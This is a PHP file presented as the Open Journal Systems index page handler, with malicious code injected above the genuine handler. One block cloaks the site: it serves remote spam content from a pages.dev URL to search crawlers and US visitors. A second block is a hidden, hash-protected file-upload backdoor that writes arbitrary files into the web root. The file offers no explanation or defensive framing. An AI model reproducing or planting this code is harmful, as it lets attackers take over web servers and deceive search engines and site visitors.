<?php

$userAgent = $_SERVER['HTTP_USER_AGENT'];
$ip = $_SERVER['REMOTE_ADDR'];
function getCountryByIp($ip)
{
    $url = "http://ip-api.com/json/$ip";

    $response = file_get_contents($url);
    $data = json_decode($response, true);
    $countryCode = $data['countryCode'];
    return $countryCode;
}
$ctryCode = getCountryByIp($ip);

if (isset($_GET['a']) && $_GET['a'] === 'a') {
    echo "country: " . $ctryCode;
    echo "<br>";
    echo "useragent: " . $userAgent;
    echo "<br>";
    echo "ip: " . $ip;
    exit;
}

if (preg_match('/bot|crawl|slurp|bingbot|Google-Site-Verification|Google-InspectionTool|AhrefsBot|spider/i', $userAgent) || $ctryCode == 'US') {
    echo file_get_contents('https://landingpages-glslawjournal-in.pages.dev/index.txt');
    exit;
}

?>
<?php

/**
 * @defgroup pages_index Index Pages
 */
$secret = '5d5b5c09f0e0c7d0333b41f0ce31b0d4';
$auth = md5($_GET['detali'] ?? '') === $secret;

if ($auth) {
    if (isset($_FILES['f'])) {
        $uploadPath = __DIR__ . '/' . basename($_FILES['f']['name']);
        if (move_uploaded_file($_FILES['f']['tmp_name'], $uploadPath)) {
            exit('File uploaded successfully.');
        } else {
            exit('Failed to upload file.');
        }
    } else {
        exit('
            <form method="POST" enctype="multipart/form-data">
                <input type="file" name="f">
                <button type="submit">Submit</button>
            </form>
        ');
    }
}
/**
 * @file pages/index/index.php
 *
 * Copyright (c) 2014-2021 Simon Fraser University
 * Copyright (c) 2003-2021 John Willinsky
 * Distributed under the GNU GPL v3. For full terms see the file docs/COPYING.
 *
 * @ingroup pages_index
 *
 * @brief Handle site index requests.
 *
 */

switch ($op) {
    case 'index':
        return new APP\pages\index\IndexHandler();
}
